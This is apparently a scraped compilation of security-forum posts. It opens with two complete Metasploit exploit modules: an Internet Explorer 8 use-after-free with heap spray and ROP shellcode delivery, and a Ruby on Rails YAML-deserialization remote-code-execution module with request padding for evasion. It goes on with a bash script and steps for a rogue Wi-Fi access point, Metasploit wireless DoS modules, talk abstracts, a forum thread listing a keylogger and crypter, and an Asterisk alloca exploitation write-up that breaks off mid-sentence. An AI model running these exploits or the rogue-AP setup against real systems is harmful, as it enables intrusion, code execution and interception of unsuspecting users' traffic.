Nytro

[h=1]Microsoft Internet Explorer Option Element Use-After-Free[/h] ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::RopDb def initialize(info={}) super(update_info(info, 'Name' => "Microsoft Internet Explorer Option Element Use-After-Free", 'Description' => %q{ This module exploits a vulnerability in Microsoft Internet Explorer. A memory corruption may occur when the Option cache isn't updated properly, which allows other JavaScript methods to access a deleted Option element, and results in code execution under the context of the user. }, 'License' => MSF_LICENSE, 'Author' => [ 'Ivan Fratric', #Initial discovery 'juan vazquez', #Metasploit 'sinn3r' #Metasploit ], 'References' => [ [ 'CVE', '2011-1996' ], [ 'MSB', 'MS11-081' ], [ 'URL', 'http://ifsec.blogspot.com/2011/10/internet-explorer-option-element-remote.html' ], [ 'URL', 'http://pastebin.com/YLH725Aj' ] ], 'Payload' => { 'StackAdjustment' => -3500, }, 'DefaultOptions' => { 'InitialAutoRunScript' => 'migrate -f' }, 'Platform' => 'win', 'Targets' => [ [ 'Automatic', {} ], [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Offset' => 0x4f8, 'OffsetVirtualFunc' => 502 } ], [ 'IE 8 on Windows Vista', { 'Rop' => :jre, 'Offset' => 0x4f8, 'OffsetVirtualFunc' => 502 } ], [ 'IE 8 on Windows 7', { 'Rop' => :jre, 'Offset' => 0x4f8, 'OffsetVirtualFunc' => 502 } ] ], 'Privileged' => false, 'DisclosureDate' => "Oct 11 2012", 'DefaultTarget' => 0)) register_options( [ OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false]) ], self.class) end def get_target(agent) #If the user is already specified by the user, we'll just use that return target if target.name != 'Automatic' nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || '' ie = agent.scan(/MSIE (\d)/).flatten[0] || '' ie_name = "IE #{ie}" case nt when '5.1' os_name = 'Windows XP SP3' when '6.0' os_name = 'Windows Vista' when '6.1' os_name = 'Windows 7' end targets.each do |t| if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name)) print_status("Target selected as: #{t.name}") return t end end return nil end def ie_heap_spray(my_target, p) js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch)) js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch)) js_random_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch)) js = %Q| function heap_spray() { var heap_obj = new heapLib.ie(0x20000); var code = unescape("#{js_code}"); var nops = unescape("#{js_nops}"); while (nops.length < 0x80000) nops += nops; var offset = nops.substring(0, #{my_target['Offset']}); var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length); while (shellcode.length < 0x40000) shellcode += shellcode; var block = shellcode.substring(0, (0x80000-6)/2); heap_obj.gc(); for (var i=1; i < 0x300; i++) { heap_obj.alloc(block); } var overflow = nops.substring(0, 10); } | js = heaplib(js, {:noobfu => true}) if datastore['OBFUSCATE'] js = ::Rex::Exploitation::JSObfu.new(js) js.obfuscate @heap_spray_func = js.sym("heap_spray") end return js end def get_payload(t, cli) code = payload.encoded # No rop. Just return the payload. return code if t['Rop'].nil? # Both ROP chains generated by mona.py - See corelan.be case t['Rop'] when :msvcrt print_status("Using msvcrt ROP") rop_payload = generate_rop_payload('msvcrt', "", {'target'=>'xp'}) rop_payload << make_nops(t['OffsetVirtualFunc']-rop_payload.length) rop_payload << "\xeb\x04" # jmp $+6 rop_payload << [0x77c15ed5].pack("V") # 0x0c0c0c0 # stackpivot => xchg eax, esp # ret rop_payload << code else print_status("Using JRE ROP") rop_payload = generate_rop_payload('java', '') rop_payload << make_nops(t['OffsetVirtualFunc']-rop_payload.length) rop_payload << "\xeb\x08" # jmp $+10 rop_payload << [0x7c348b05].pack("V") # stackpivot => xchg eax, esp # ret rop_payload << [0x7c348b05].pack("V") # stackpivot => xchg eax, esp # ret rop_payload << code end return rop_payload end def load_exploit_html(my_target, cli) @heap_spray_func = "heap_spray" p = get_payload(my_target, cli) js = ie_heap_spray(my_target, p) #var fakeobj = unescape("%u0c0c%u0c0c"); #call to 0c0c0c0c #eax ==> 0c0c0a14 html = %Q| <!DOCTYPE html> <html> <head> <script> #{js} function ivan() { var fakeobj = unescape("%u0a14%u0c0c"); fakeobj += unescape("%u4141%u4141"); while (fakeobj.length <= 0x38/2) fakeobj += unescape("%u4141%u4141"); var formobj, selobj, optobj; selobj = document.getElementById("select1"); formobj = selobj.form; var imgarray = new Array(); for(var j = 0; j < 500; j++) { imgarray.push(document.createElement("img")); } for(var i=0;i<5;i++) { optobj = document.createElement('option'); optobj.text = "test"; selobj.add(optobj); } selobj.innerText = "foo"; for(var i = 0; i < imgarray.length; i++) { imgarray[i].title = fakeobj.substring(0, 0x38 / 2 - 1); } #{@heap_spray_func}(); formobj.reset(); } </script> </head> <body onload='ivan()'> <form method="post"> <select id="select1"> </select> </form> </body> </html> | return html end def on_request_uri(cli, request) agent = request.headers['User-Agent'] uri = request.uri print_status("Requesting: #{uri}") my_target = get_target(agent) # Avoid the attack if no suitable target found if my_target.nil? print_error("Browser not supported, sending 404: #{agent}") send_not_found(cli) return end html = load_exploit_html(my_target, cli) html = html.gsub(/^\t\t/, '') print_status("Sending HTML...") send_response(cli, html, {'Content-Type'=>'text/html'}) end end Sursa: Microsoft Internet Explorer Option Element Use-After-Free

[h=1]Ruby on Rails XML Processor YAML Deserialization Code Execution[/h] ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::CmdStagerTFTP include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Ruby on Rails XML Processor YAML Deserialization Code Execution', 'Description' => %q{ This module exploits a remote code execution vulnerability in the XML request processor of the Ruby on Rails application framework. This vulnerability allows an attacker to instantiate a remote object, which in turn can be used to execute any ruby code remotely in the context of the application. This module has been tested across multiple versions of RoR 3.x and RoR 2.x }, 'Author' => [ 'charlisome', # PoC 'espes', # PoC and Metasploit module 'lian', # Identified the RouteSet::NamedRouteCollection vector 'hdm' # Module merge/conversion/payload work ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2013-0156'], ['URL', 'https://community.rapid7.com/community/metasploit/blog/2013/01/09/serialization-mischief-in-ruby-land-cve-2013-0156'] ], 'Platform' => 'ruby', 'Arch' => ARCH_RUBY, 'Privileged' => false, 'Targets' => [ ['Automatic', {} ] ], 'DisclosureDate' => 'Jan 7 2013', 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(80), OptString.new('URIPATH', [ true, 'The path to a vulnerable Ruby on Rails application', "/"]), OptString.new('HTTP_METHOD', [ true, 'The HTTP request method (GET, POST, PUT typically work)', "POST"]) ], self.class) register_evasion_options( [ OptBool.new('XML::PadElement', [ true, 'Pad the exploit request with randomly generated XML elements', true]) ], self.class) end # # This stub ensures that the payload runs outside of the Rails process # Otherwise, the session can be killed on timeout # def detached_payload_stub(code) %Q^ code = '#{ Rex::Text.encode_base64(code) }'.unpack("m0").first if RUBY_PLATFORM =~ /mswin|mingw|win32/ inp = IO.popen("ruby", "wb") rescue nil if inp inp.write(code) inp.close end else if ! Process.fork() eval(code) rescue nil end end ^.strip.split(/\n/).map{|line| line.strip}.join("\n") end # # Create the YAML document that will be embedded into the XML # def build_yaml_rails2 # Embed the payload with the detached stub code = Rex::Text.encode_base64( detached_payload_stub(payload.encoded) ) yaml = "--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection\n" + "'#{Rex::Text.rand_text_alpha(rand(8)+1)}; " + "eval(%[#{code}].unpack(%[m0])[0]);' " + ": !ruby/object:ActionController::Routing::Route\n segments: []\n requirements:\n " + ":#{Rex::Text.rand_text_alpha(rand(8)+1)}:\n :#{Rex::Text.rand_text_alpha(rand(8)+1)}: " + ":#{Rex::Text.rand_text_alpha(rand(8)+1)}\n" yaml end # # Create the YAML document that will be embedded into the XML # def build_yaml_rails3 # Embed the payload with the detached stub code = Rex::Text.encode_base64( detached_payload_stub(payload.encoded) ) yaml = "--- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection\n" + "'#{Rex::Text.rand_text_alpha(rand(8)+1)}; " + "eval(%[#{code}].unpack(%[m0])[0]);' " + ": !ruby/object:OpenStruct\n table:\n :defaults: {}\n" yaml end # # Create the XML wrapper with any desired evasion # def build_request(v) xml = '' elo = Rex::Text.rand_text_alpha(rand(12)+4) if datastore['XML::PadElement'] xml << "<#{elo}>" 1.upto(rand(1000)+50) do el = Rex::Text.rand_text_alpha(rand(12)+4) tp = ['string', 'integer'][ rand(2) ] xml << "<#{el} type='#{tp}'>" xml << ( tp == "integer" ? Rex::Text.rand_text_numeric(rand(8)+1) : Rex::Text.rand_text_alphanumeric(rand(8)+1) ) xml << "</#{el}>" end end el = Rex::Text.rand_text_alpha(rand(12)+4) xml << "<#{el} type='yaml'>" xml << (v == 2 ? build_yaml_rails2 : build_yaml_rails3) xml << "</#{el}>" if datastore['XML::PadElement'] 1.upto(rand(1000)+50) do el = Rex::Text.rand_text_alpha(rand(12)+4) tp = ['string', 'integer'][ rand(2) ] xml << "<#{el} type='#{tp}'>" xml << ( tp == "integer" ? Rex::Text.rand_text_numeric(rand(8)+1) : Rex::Text.rand_text_alphanumeric(rand(8)+1) ) xml << "</#{el}>" end xml << "</#{elo}>" end xml end # # Send the actual request # def exploit print_status("Sending Railsv3 request to #{rhost}:#{rport}...") res = send_request_cgi({ 'uri' => datastore['URIPATH'] || "/", 'method' => datastore['HTTP_METHOD'], 'ctype' => 'application/xml', 'data' => build_request(3) }, 25) handler print_status("Sending Railsv2 request to #{rhost}:#{rport}...") res = send_request_cgi({ 'uri' => datastore['URIPATH'] || "/", 'method' => datastore['HTTP_METHOD'], 'ctype' => 'application/xml', 'data' => build_request(2) }, 25) handler end end Sursa: Ruby on Rails XML Processor YAML Deserialization Code Execution

[h=1]Expert Finds Java 1.7 Zero-Day on High-Profile Website[/h] January 10th, 2013, 14:29 GMT · By Eduard Kovacs The security expert known as Kafeine, the curator of the Malware Don’t Need Coffee website, has come across a new Java zero-day. The vulnerability affects the latest Java 1.7 and it has been found on a website that allegedly records hundreds of thousands of hits each day. Experts from AlienVault have analyzed the exploit and they've shown that a malicious Java applet can be used to execute code (in their example, the Calculator application from Windows). “The Java file is highly obfuscated but based on the quick analysis we did the exploit is probably bypassing certain security checks tricking the permissions of certain Java classes as we saw in CVE-2012-4681,” AlienVault’s Jaime Blasco explained. Researchers from Bitdefender are also analyzing the zero-day which, they say, has been integrated into the recently developed Cool exploit kit. While more details of the vulnerability come to light, experts advise users to disable Java and avoid clicking on suspicious links. Sursa: Expert Finds Java 1.7 Zero-Day on High-Profile Website - Softpedia

[h=1]REPT Reverse Engineering[/h]The whole tutorial is about playing with a target and implementing new things into it. The article is not for newbies, you must know how the tools given in this tutorial works. Tutoriale: http://199.201.127.158/index.php?dir=RCE%20Tutorials/REPT%20Reverse%20Engineering%20Techniques/ Via: REPT Reverse Engineering Technqiues No. 1 - rohitab.com - Forums

INTRODUCTION TO ARM LINUX EXPLOITING Metin KAYA kayameti@gmail.com 2013.01.09, 15:30, Istanbul Metin KAYA - Official Web Site [EnderUNIX] http://www.twitter.com/_metinkaya This paper is the Linux version of the document http://www.signalsec.com/publications/arm_exploiting.pdf which mentions exploiting ARM on Windows systems. Thanks Celil ÜNÜVER for inspiring me. The ARM architecture is used in crucial positions; e.g., mobile phones, femtocells, smallcells, SCADA systems, POS machines. Basic knowledge on ARM, GDB, GCC, C, assembly, Python, and some bash commands is necessary to understand what is going on in the document. The host machine is x86 Linux (32 bit 3.5.0 kernel), so an ARM cross compiler [1] is required for target machine which is ARMv7 little-endian Linux (32 bit 2.6.34 kernel). Download: http://packetstorm.foofus.com/papers/general/exploit_arm_linux_en.pdf

Create Wireless Rogue Access Point Description: In this video I will show you how to create a fake Access point. What is the purpose to create this Fake Access Point ? Lets see if you are in a public place you have all wifi attack gadgets, and you setup a fake access point in the public places AP name called “FreeNetOnlyForToday” maybe people will try to connect this AP - Now what can you do ? You can fire a Metasploit on it because all connections belong to you and tons of stuff you can perform. In the next video I will cover how to create a fake AP and get Passwords. Steps : - apt-get install dhcp3-server airmon-ng start wlan0 airbase-ng -e FreeNet -c 11 -v wlan0 ifconfig at0 up ifconfig at0 11.0.0.254 netmask 255.255.255.0 route add -net 11.0.0.0 netmask 255.255.255.0 gw 11.0.0.254 ---- Add Config in dhcp3 ---- Path = /etc/dhcp3/dhcpd.conf ---- Paste it this ----- ddns-update-style ad-hoc; default-lease-time 600; max-lease-time 7200; authoritative; subnet 10.0.0.0 netmask 255.255.255.0 { option subnet-mask 255.255.255.0; option broadcast-address 10.0.0.255; option routers 10.0.0.254; option domain-name-servers 8.8.8.8; range 10.0.0.1 10.0.0.140; } iptables --flush iptables --table nat --flush iptables --delete-chain iptables --table nat --delete-chain iptables -P FORWARD ACCEPT iptables -t nat -A POSTROUTING -o eth3 -j MASQUERADE echo > '/var/lib/dhcp3/dhcpd.leases' ln -s /var/run/dhcp3-server/dhcpd.pid /var/run/dhcpd.pid dhcpd3 -d -f -cf /etc/dhcp3/dhcpd.conf at0 echo "1" > /proc/sys/net/ipv4/ip_forward If you feel boring to type all these commands no problem ? Use this Bash Script. This bash script will automate your whole process. But check all the connection in bash script or you will get an error. Source : - exploit.co.il #!/bin/bash echo "Killing Airbase-ng..." pkill airbase-ng sleep 2; echo "Killing DHCP..." pkill dhcpd3 sleep 5; echo "Putting Wlan In Monitor Mode..." airmon-ng stop wlan0 # Change to your wlan interface sleep 5; airmon-ng start wlan0 # Change to your wlan interface sleep 5; echo "Starting Fake AP..." airbase-ng -e FreeNet -c 11 -v mon0 & # Change essid, channel and interface sleep 5; ifconfig at0 up ifconfig at0 10.0.0.254 netmask 255.255.255.0 # Change IP addresses as configured in your dhcpddhcpd.conf route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.254 sleep 5; iptables --flush iptables --table nat --flush iptables --delete-chain iptables --table nat --delete-chain iptables -P FORWARD ACCEPT iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE # Change eth0 to your internet facing interface echo > '/var/lib/dhcp3/dhcpd.leases' ln -s /var/run/dhcp3-server/dhcpd.pid /var/run/dhcpd.pid dhcpd3 -d -f -cf /etc/dhcp3/dhcpd.conf at0 & sleep 5; echo "1" > /proc/sys/net/ipv4/ip_forward Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Create Wireless Rogue Access Point

Iran's Real Life Cyberwar Description: Abstract The recent Stuxnet, Flame and CA compromises involving Comodo and DigiNotar had three common elements, each was government sponsored, each involved Iran and all three involved a PKI compromise. The presenter will share experience of dealing with the Iranian attack, highlighting the ways in which government sponsored attacks are very different from both 'ordinary' criminal attacks and the Hollywood view of 'cyberwarfare'. ***** Speaker: Phillip Hallam-Baker, Vice President and Principal Scientist, Comodo Inc. Dr Hallam-Baker is an internationally recognized computer security specialist credited with 'significant contributions' to the design of HTTP 1.0, the core protocol of the World Wide Web. His book 'dotCrime Manifesto: How to Stop Internet Crime' sets out the first technical blueprint for how to make the Web and the Internet a less crime permissive environment by introducing accountability controls for transactions that require them. Hallam-Baker has made significant contributions to core Internet security protocols, including XKMS, SAML, WS-Security, WS-Trust and KEYPROV. He has participated in standards groups in IETF, W3C and OASIS and played a key role in establishing the concept of Extended Validation certificates as an Industry standard. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Iran's Real Life Cyberwar - Phillip Hallam-Baker on Vimeo Sursa: Iran's Real Life Cyberwar

Sql Server Exploitation, Escalation And Pilfering Description: Abstract During this presentation attendees will be introduced to lesser known, yet significant vulnerabilities in SQL Server implementations related to common trust relationships, misconfigurations, and weak default settings. The issues that will be covered are often leveraged by attackers to gain unauthorized access to high value systems, applications, and sensitive data. An overview of each issue, common vectors of attack, and manual techniques will be covered. Finally newly created Metasploit modules and TSQL scripts will be demonstrated that help automate the attacks. This presentation will be valuable to penetration testers who are looking for faster ways to gain access to critical data and systems. Additionally, it should be worth while for developers and database administrators who are interested in gaining a better understanding of how to protect their applications and databases from these attacks. ***** Speakers Antti Rantasaari, Security Consultant, NetSPI Antti Rantasaari is currently a security consultant at NetSPI. He is responsible for performing security assessments and contributing to the development of the methodologies, techniques, and tools used during network and application penetration testing. Scott Sutherland, NetSPI Scott Sutherland is a Principal Security Consultant at NetSPI. Scott is responsible for the development and execution of penetration testing for the firm. He has developed a number of the proprietary tools and techniques that the company uses and also plays a major role in the skills development and training of the NetSPI network and application penetration testing team. Scott is an active participant in the information security community, regularly contributing technical security blog posts, whitepapers, and presenting at a wide variety of conferences. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: SQL Server Exploitation, Escalation and Pilfering - Antti Rantasaari and Scott Sutherland on Vimeo Sursa: Sql Server Exploitation, Escalation And Pilfering

Wireless Exploitation Using Metasploit Framework Description: In this video I will show you how to use Metasploit Auxiliary dos modules for wireless exploitations. Modules are not much effective but some modules are very effective like fuzzing became frame, flooding etc.. I will cover more auxiliary modules in the next video. I have used three modules. auxiliary/dos/wifi/fakeap This module can advertise thousands of fake access points, using random SSIDs and BSSID addresses. Inspired by Black Alchemy's fakeap tool. auxiliary/dos/wifi/deauth This module sends 802.11 DEAUTH requests to a specific wireless peer, using the specified source address and source BSSID. auxiliary/dos/wifi/ssidlist_beacon This module sends out beacon frames using SSID's identified in a specified file and randomly selected BSSID's. This is useful when combined with a Karmetasploit attack to get clients configured to not probe for networks in their PNL to start probing when they see a matching SSID in from this script. For a list of common SSID's to use with this script, check WiGLE - Wireless Geographic Logging Engine - SSID Stats. If a file of SSID's is not specified, a default list of 20 SSID's will be used. This script will run indefinitely until interrupted. Source : - Penetration Testing Software | Metasploit Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Wireless Exploitation Using Metasploit Framework

Unraveling Some Of The Mysteries Around Dom-Based Xss Description: Abstract DOM-based XSS was first revealed to the world back in 2005 by Amit Klien, when it was an interesting theoretical vulnerability. In 2012, with the push towards Web 2.0 well into the mainstream, DOM-based XSS has become a very commonly uncovered and exploited vulnerability, but it’s poorly understood. This talk will focus on the full range of issues around DOM-based XSS. It will start with a discussion of the technical details of the vulnerability, the true nature of the risk it introduces (both likelihood and impact), and some new terminology and updated definitions about what truly is a DOM-based XSS vulnerability as compared to the standard Stored and Reflected XSS that the community is well aware of. It will then discuss the difficulties that security analysts face when trying to find DOM-based XSS flaws, and provide recommended analysis techniques that help move DOM-based XSS discovery from an art towards more of a science. And finally, it will discuss simple techniques for avoiding DOM-based XSS issues in the first place as well as how to mitigate issues that are uncovered during a security review. ***** Speaker Dave Wichers, COO, Aspect Security Dave Wichers is a cofounder and the Chief Operating Officer (COO) of Aspect Security, a company that specializes in application security services. He is also a long time contributor to OWASP including being a member of the OWASP Board since it was formed in 2003. | Dave has over 20 years of experience in the information security field, and has focused exclusively on application security since 1998. At Aspect, in addition to his COO duties, he is Aspect's application security courseware… Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Unraveling Some of the Mysteries around DOM-Based XSS - Dave Wichers on Vimeo Sursa: Unraveling Some Of The Mysteries Around Dom-Based Xss

Daca tot discutam despre asa ceva, de ce nu postati si niste proiecte facute de voi? PHP: - VL Download CMS (script pentru descarcari) - Selenity CMS (un mic portal) - Site-ul "clasei" (mi-a iesit o grafica acceptabila) - Lucrarea de licenta a unui baiat Visual Basic 6: - Yahoo! Manager v1.2 - Digital Keylogger v3.0/4.0 - Royal Crypter v3.0 - Multe alte porcarii (IP locator si mai stiu eu ce...) C#: - Vreo 3 proiecte pentru munca C++: - DarkyBinder v2.0 (primul si singurul binder pentru Linux) - FileDownloader (WinAPI) - DataKiller (sterge tot ce apuca) - Chestii de liceu/facultate (liste inlantuite, clasa pentru BigInt si alte prostii) + Sunt programator C++ (Linux), deci am scris ceva linii de cod Aproximez undeva la 50.000 de linii de cod scrise in total (in toate limbajele pe care le cunosc, mai mult sau mai putin), ceea ce mi se pare cam putin, dar este timp.

Cam... MARE. Ma refer fizic. Cred ca are juma de kil...

Deci in ultimele 3 luni ai scris peste 10000 de linii de cod in 5 limbaje diferite?

Ce limbaje de programare CUNOSTI? Iar prin asta vreau sa zic "In ce limbaje de programare ai scris PESTE 2000 de linii de cod?" Ati putea si sa postati cand ati scris ultima linie de cod. Votati. Evitati caterinca.

HyperDbg HyperDbg is a kernel debugger that leverages hardware-assisted virtualization. More precisely, HyperDbg is based on a minimalistic hypervisor that is installed while the system runs. Compared to traditional kernel debuggers (e.g., WinDbg, SoftIce, Rasta R0 Debugger) HyperDbg is completely transparent to the kernel and can be used to debug kernel code without the need of serial (or USB) cables. For example, HyperDbg allows to single step the execution of the kernel, even when the kernel is executing exception and interrupt handlers. Compared to traditional virtual machine based debuggers (e.g., the VMware builtin debugger), HyperDbg does not require the kernel to be run as a guest of a virtual machine, although it is as powerful. Feel free to contact us for suggestions, criticisms, and bug reports through the HyperDbg google group: hyperdbg | Google Groups Further details about HyperDbg are available in the paper "Dynamic and Transparent Analysis of Commodity Production Systems" (published in the proceedings of ASE 2010). The paper can be downloaded here. Download: http://code.google.com/p/hyperdbg/

[h=1]Defrag Tools: #22 - WinDbg - Memory Kernel Mode[/h]By: Larry Larsen, Andrew Richards, Chad Beeder In this episode of Defrag Tools, Andrew Richards, Chad Beeder and Larry Larsen continue looking at the Debugging Tools for Windows (in particular WinDbg). WinDbg is a debugger that supports user mode debugging of a process, or kernel mode debugging of a computer. This installment goes over the commands used to show the memory used in a kernel mode debug session. We cover these commands: !vm !vm 1 !memusage 8 !poolused 2 !poolused 4 !poolfind <tag> !pool <addr> !pool <addr> 2 !pte Make sure you watch Defrag Tools Episode #1 for instructions on how to get the Debugging Tools for Windows and how to set the required environment variables for symbols and source code resolution. Resources: Microsoft Windows SDK for Windows 7 and .NET Framework 4 Sysinternals LiveKD Sysinternals RAMMap Timeline: [00:45] - Sysinternals LiveKD debug of the machine [01:47] - Virtual Memory summary (!vm 1) [05:10] - Sysinternals LiveKD live kernel dump (livekd.exe -m -o kernel.dmp) [09:30] - Sysinternals RAMMap [11:10] - Memory List summary (!memusage 8) [16:15] - Pool Usage by Non-Paged Pool (!poolused 2) [20:16] - Pool Tags (c:\debuggers\triage\pooltag.txt) [28:06] - Pool Usage by Paged Pool (!poolused 4) [29:27] - Pool issues lead to Bugchecks [34:00] - Find Pool by Address (!pool <addr>) [36:05] - Find Pool by Tag (!poolfind <tag>) [40:30] - Page Table Entry (PTE) and Page Frame Number (PFN) (!pte <addr>) [42:45] - Sometimes it is a physical hardware failure Video: Defrag Tools: #22 - WinDbg - Memory Kernel Mode | Defrag Tools | Channel 9

DoS? Then Who Was Phone? Introduction This post presents exploitation notes on a vulnerability we discovered in Asterisk, an open source telephony solution produced by Digium. We reported this bug to Digium on November 27th, 2012, and provided it to customers of the Exodus Intelligence Feed as EIP-2012-0008. Digium released the advisory AST-2012-014 for this vulnerability on January 2nd, 2013, which was picked up shortly after by some of the aggregator sites and incorrectly categorized as a denial-of-service; however, this bug is certainly exploitable. As we found it fun to analyze, and since discussions about server-side memory bugs are a little sparse now-a-days, we thought it would be cool to share for others who might also find it interesting. Vulnerability The vulnerability resides in the HTTP Asterisk Management Interface (AMI) service, and is the result of an alloca being used to “allocate” memory with a remotely-supplied, untrusted size value. The vulnerability is present in the Asterisk source code file main/http.c, specifically in the function ast_http_get_post_vars, which as the name would suggest is used to parse HTTP post variable data. A snip of the pertinent vulnerable code in this function is shown below: struct ast_variable *ast_http_get_post_vars( struct ast_tcptls_session_instance *ser, struct ast_variable *headers) { int content_length = 0; struct ast_variable *v, *post_vars=NULL, *prev = NULL; char *buf, *var, *val; for (v = headers; v; v = v->next) { if (!strcasecmp(v->name, "Content-Type")) { if (strcasecmp(v->value, "application/x-www-form-urlencoded")) { return NULL; } break; } } for (v = headers; v; v = v->next) { if (!strcasecmp(v->name, "Content-Length")) { content_length = atoi(v->value) + 1; break; } } if (!content_length) { return NULL; } if (!(buf = alloca(content_length))) { return NULL; } if (!fgets(buf, content_length, ser->f)) { return NULL; } The code shows the length value being converted from the Content-Length string using atoi, then incremented by one and stored in the content_length variable. Memory is obtained by alloca for the expected content length, and pointed to by *buf. Finally, fgets is called to read the expected amount of content data into this buffer. I found it interesting that the code looks as though it may have been written with memory management issues in mind, as the check to ensure content_length is not zero would catch an integer overflow caused by adding one to the value. Below is a snip of disassembled code for the vulnerable function as compiled in the Asterisk package shipped with Ubuntu. This snip shows the size value being set and used to subtract the stack pointer (ESP) to “allocate” stack memory: <ast_http_get_post_vars+187>: call <strtol@plt> <ast_http_get_post_vars+192>: mov edx,eax <ast_http_get_post_vars+194>: add edx,0x1 <ast_http_get_post_vars+197>: je <ast_http_get_post_vars+408> <ast_http_get_post_vars+203>: mov ecx,DWORD PTR [ebp-0x30] <ast_http_get_post_vars+206>: add eax,0x1f <ast_http_get_post_vars+209>: and eax,0xfffffff0 <ast_http_get_post_vars+212>: sub esp,eax <----- LOL <ast_http_get_post_vars+214>: lea esi,[esp+0x1b] As shown, the alloca is compiled into a simple set of instructions to ADD and AND-off the size to be allocated from the stack. It then subtracts the revised size from the stack pointer, and stores an address derived from this into the ESI register for further use. Exploitation Obstacles Since most compilers implement alloca as a fairly direct subtraction of the stack pointer, the exploitation of alloca is often as simple as providing a size value large enough to wrap the stack pointer around to a desirable location higher on the stack. Subsequent use of the pointer to store remotely supplied data would then result in stack memory corruption, and allow for vanilla exploitation techniques to gain control of program execution flow. However, here the vulnerable code uses the function fgets to read network data into the obtained memory space. This complicates the situation for exploitation as the libc implementation of fgets performs a check on its length argument to ensure that it is not beyond the signed integer boundary of 0x7FFFFFFF. If this check fails, fgets does not read data and returns an error. The code snip below shows the check performed inside of fgets as implemented in libc.6.so: <fgets+0>: sub esp,0x4c <fgets+3>: mov DWORD PTR [esp+0x48],ebp <fgets+7>: mov ebp,DWORD PTR [esp+0x54] <fgets+11>: mov DWORD PTR [esp+0x3c],ebx <fgets+15>: call <mov_esp_ebx> <fgets+20>: add ebx,0x14051c <fgets+26>: mov DWORD PTR [esp+0x40],esi <fgets+30>: mov esi,DWORD PTR [esp+0x58] <fgets+34>: test ebp,ebp <fgets+36>: mov DWORD PTR [esp+0x44],edi <fgets+36>: mov DWORD PTR [esp+0x44],edi <fgets+40>: jle <fgets+336> ... <fgets+336>: mov DWORD PTR [esp+0x50],0x0 <fgets+344>: jmp <fgets+256> ... <fgets+256>: mov eax,DWORD PTR [esp+0x50] <fgets+260>: mov ebx,DWORD PTR [esp+0x3c] <fgets+264>: mov esi,DWORD PTR [esp+0x40] <fgets+268>: mov edi,DWORD PTR [esp+0x44] <fgets+272>: mov ebp,DWORD PTR [esp+0x48] <fgets+276>: add esp,0x4c <fgets+279>: ret The EBP register, containing the length argument, is checked to be a positive signed value using the TEST and JLE instructions at <fgets+34> and <fgets+40>. If the check fails, the code jumps to return an error, making fgets unusable for exploiting a wrapped stack pointer to overwrite memory with data read from the network. While stack corruption by this means is still possible through the pushing and moving of data to the stack by other compiled code operations, the lack of control and limited set of operations make this approach undesirable. At this point some might categorize this vulnerability as purely theoretical or possibly even unexploitable. As I hope many readers would agree, a challenge of this nature is always inviting. The Exodus team loves goading and trolling one another in these scenarios, usually with something along the lines of “Yeah, it is probably too tough for you to exploit…” or “you should probably just give up.” The recipient of this pep talk usually proceeds to cry and reevaluate the code until an idea hits them or they decide to resign to a life of PCI compliance auditing. Challenge accepted. EIP Control After spending some time analyzing the problem and hating computers, I found a way to exploit this vulnerability. The HTTP listener for the Asterisk Management Interface handles every new connection by creating a new thread to execute a designated worker function to process the request. The code to setup and complete this task is spread out across multiple functions and macros and is a little messy, so we’ll try to keep details to a minimum. The HTTP AMI is started initially by a call chain of functions starting with ast_http_init, which calls __ast_http_load, which then calls ast_tcptls_server_start. The function ast_tcptls_server_start performs standard TCP socket setup operations, and is defined as: void ast_tcptls_server_start(struct ast_tcptls_session_args *desc) Despite the name, ast_tcptls_server_start is used for both TLS and non-TLS service setup. The single argument taken by this function is a structure describing aspects of the server to be started. From __ast_http_load, the call looks like: ast_tcptls_server_start(&http_desc); The structure structure http_desc is defined in main/http.c as: static struct ast_tcptls_session_args http_desc = { .accept_fd = -1, .master = AST_PTHREADT_NULL, .tls_cfg = NULL, .poll_timeout = -1, .name = "http server", .accept_fn = ast_tcptls_server_root, .worker_fn = httpd_helper_thread, }; The .accept_fn is a function pointer for a function to accept the connection, and the worker_fn is a pointer to the worker function responsible for processing the request once a new thread is created. After more setup code, a new thread is created to accept socket connections by calling the function ast_tcptls_server_root. For each TCP connection accepted on the listening HTTP port (default 8088), ast_tcptls_server_root calls the following thread creation wrapper to create a new thread and eventually call the worker function: ... if (ast_pthread_create_detached_background(&launched, NULL, handle_tcptls_connection, tcptls_session)) { ast_log(LOG_WARNING, "Unable to launch helper thread: %s\n", strerror(errno)); ast_tcptls_close_session_file(tcptls_session); ao2_ref(tcptls_session, -1); } ... The function 